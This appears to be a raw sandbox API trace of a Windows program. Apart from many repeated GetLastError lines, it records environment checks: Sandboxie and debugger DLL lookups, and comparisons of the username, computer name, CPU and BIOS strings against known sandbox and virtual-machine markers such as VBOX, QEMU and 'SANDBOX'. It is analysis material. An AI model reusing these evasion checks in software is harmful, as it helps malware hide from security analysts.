	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetNativeSystemInfo (in: lpSystemInfo=0x262f970 | out: lpSystemInfo=0x262f970*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Hardware\\DESCRIPTION\\System\\CentralProcessor\\0", phkResult=0x262f9e0 | out: phkResult=0x262f9e0*=0x1ec) returned 0x0
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.974] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] GetLastError () returned 0xcb
	[0087.975] RegQueryValueExW (in: hKey=0x1ec, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x262f570, lpcbData=0x262f9dc*=0x200 | out: lpType=0x0, lpData=0x262f570*=0x49, lpcbData=0x262f9dc*=0x52) returned 0x0
	[0087.975] StrStrIW (lpFirst="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", lpSrch="Xeon") returned 0x0
	[0087.975] RegCloseKey (hKey=0x1ec) returned 0x0
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.976] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x75070000
	[0087.977] GetProcAddress (hModule=0x75070000, lpProcName="UuidCreateSequential") returned 0x7507db30
	[0087.977] UuidCreateSequential (in: Uuid=0x262f760 | out: Uuid=0x262f760) returned 0x0
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.977] GetLastError () returned 0xcb
	[0087.978] GetModuleHandleA (lpModuleName="dbghelp.dll") returned 0x0
	[0087.978] GetModuleHandleA (lpModuleName="sbiedll.dll") returned 0x0
	[0087.978] GetUserNameA (in: lpBuffer=0x434fa8, pcbBuffer=0x262f810 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x262f810) returned 1
	[0087.979] lstrcmpA (lpString1="Nd9E1FYi", lpString2="CurrentUser") returned 1
	[0087.979] lstrcmpA (lpString1="Nd9E1FYi", lpString2="Sandbox") returned -1
	[0087.980] GetComputerNameA (in: lpBuffer=0x434fa8, nSize=0x262f810 | out: lpBuffer="X2VS1CUM", nSize=0x262f810) returned 1
	[0087.980] lstrcmpA (lpString1="X2VS1CUM", lpString2="SANDBOX") returned 1
	[0087.980] lstrcmpA (lpString1="X2VS1CUM", lpString2="7SILVIA") returned 1
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.980] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.981] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", phkResult=0x262f7d4 | out: phkResult=0x262f7d4*=0x214) returned 0x0
	[0087.982] RegQueryValueExA (in: hKey=0x214, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x262f7cc, lpData=0x434fa8, lpcbData=0x262f7d0*=0x400 | out: lpType=0x262f7cc*=0x7, lpData=0x434fa8*, lpcbData=0x262f7d0*=0x76) returned 0x0
	[0087.982] RegCloseKey (hKey=0x214) returned 0x0
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.982] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.983] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="AMI ") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch=0x0) returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="BOCHS") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="VBOX") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="QEMU") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="SMCI") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="INTEL  - 6040000") returned 0x0
	[0087.984] StrStrA (lpFirst="GBT    - 1000", lpSrch="FTNT-1") returned 0x0
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.984] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", phkResult=0x262f7d4 | out: phkResult=0x262f7d4*=0x214) returned 0x0
	[0087.985] RegQueryValueExA (in: hKey=0x214, lpValueName="VideoBiosVersion", lpReserved=0x0, lpType=0x262f7cc, lpData=0x434fa8, lpcbData=0x262f7d0*=0x400 | out: lpType=0x262f7cc*=0x0, lpData=0x434fa8*=0x47, lpcbData=0x262f7d0*=0x400) returned 0x2
	[0087.985] RegCloseKey (hKey=0x214) returned 0x0
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] StrStrA (lpFirst="GBT    - 1000", lpSrch="VirtualBox") returned 0x0
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.985] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.986] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] RegCreateKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", phkResult=0x262f7d4 | out: phkResult=0x262f7d4*=0x214) returned 0x0
	[0087.987] RegQueryValueExA (in: hKey=0x214, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x262f7cc, lpData=0x434fa8, lpcbData=0x262f7d0*=0x400 | out: lpType=0x262f7cc*=0x0, lpData=0x434fa8*=0x47, lpcbData=0x262f7d0*=0x400) returned 0x2
	[0087.987] RegCloseKey (hKey=0x214) returned 0x0
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.987] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] StrStrA (lpFirst="GBT    - 1000", lpSrch="55274-640-2673064-23950") returned 0x0
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
	[0087.988] GetLastError () returned 0xcb
